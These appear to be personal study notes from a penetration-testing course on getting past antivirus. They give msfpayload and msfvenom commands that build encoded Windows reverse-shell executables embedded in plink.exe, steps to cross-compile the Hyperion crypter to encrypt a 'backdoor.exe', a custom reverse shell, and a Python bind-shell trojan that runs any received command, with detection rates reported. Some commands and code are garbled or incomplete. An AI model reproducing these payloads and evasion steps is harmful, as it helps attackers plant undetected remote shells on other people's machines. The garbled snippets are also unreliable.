ANTIVIRUS AVOIDANCE - Overview
The process of bypassing antivirus software involves chaning or encrypting the contents of a known malicious file so as to change it's binary structure. By doing so the known structure of a malicious file is no longer relevant and the new structure may fool the antivirus software in to ignoring this file. Depending on the type and quality of the antivirus software being tested sometimes an antivirus bypass can be achieved by changing a couple of harmless strings inside the binary file from lowercase to uppercase as different antivirus software use different signatures and technologies to detect malware, it's usually difficult to find a universal solution to bypass all products. Quite often this is trial and error to get past the AV in a test environment. Saying this we have several tools available to us in Kali that can help us get past AV.
The examples below are the old way using msfpayload and msfencode. These days we use msfvenom. The book should show this with up to date syntax.
Standard reverse shell without encoding:
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 X > ~/Desktop/shell_reverse.exe
Now encoded with shikata ga nai and encoded 9 times.
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 | msfencode -e x86/shikata_ga_nai -t exe -c 9 -o ~/Desktop/shell_reverse_msf_encoded.exe
Now encoded with shikata ga nai and encoded 9 times and embedded in to a non-malicious PE file.
#msfpayload windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 | msfencode -e x86/shikata_ga_nai -t exe -c 9 -x /usr/share/windows-binaries/plink.exe -o ~/Desktop/shell_reverse_msf_encoded.exe
UP TO DATE SYNTAX - encoded and embedded:
#msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.179 LPORT=4444 -e x86/shikata_ga_nai -i 9 -c /usr/share/windows-binaries/plink.exe -f exe -o ~/Desktop/msfvenom_encoded_embedded_reverse_shell.exe
ANTIVIRUS AVOIDANCE - Packers and Crypters
Software protection tools and executable crypters are most commonly used to obfuscate and license binaries by software vendors to rpevent reverse engineering attempts by software pirates. These same tools are effective at obfuscating malware and can often help avoid antivirus detection. One such open source crypter is called HYPERION and is present on Kali.
For this example, we have copied over our best performing payload and called it backdoor.exe
We have then copied hyperion from the windows binaries section in to the same folder as backdoor.exe
Once extracted I cross compile the hyperion source code to create a windows executable.
NOTE: The syntax below is old - example at end of this section is up to date. I need to reference what I did in earlier modules to get the right details to run mingw.
hyperion-1.0#i586-mingw32mvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Invoke the windows executable and use it to protect and meterpreter reverse shell.
hyperion-1.0#wine hyperion.exe ../backdoor.exe ~/Desktop/crypted
The file has now been encrypted and protected. Detection rate has been halved.
EXAMPLE FROM THE BOOK: This looks to be more up to date syntax
root@kali:~# cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
root@kali:~# cp /usr/share/windows-binaries/Hyperion-1.0.zip
root@kali:~# unzip Hyperion-1.0.zip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe
ANTIVIRUS AVOIDANCE - Private Custom Tools
An even more effective way to reduce detection is to use tools that are unknown to antivirus vendors, either by writing our own or by using non-mainstream code.
For example you could find a reverse shell written in C with a google search. This code may not be commonly used.
Cross compile reverse.c in Kali
$i586-mingw32mvc-gcc reverse.c -o ~/Desktop/custom-reverse.exe -lws2_32
This example resulted in a detection rate of 1/47.
Let's go one step further and write our own python bind shell trojan.
host = '0.0.0.0'
port = 4444
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client, address = s.accept()
client.snd("[+] Welcome Master\r\n\r\n>")
data = client.recv(1024)
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = proc.stdout.read() + proc.stderr.read()
This code will listen on prt 4444 and run anything sent to it on port 4444. A basic bind shell trojan.
Bi compile this python code to a windows executable using py-installer.
Detection rate is now 2/47.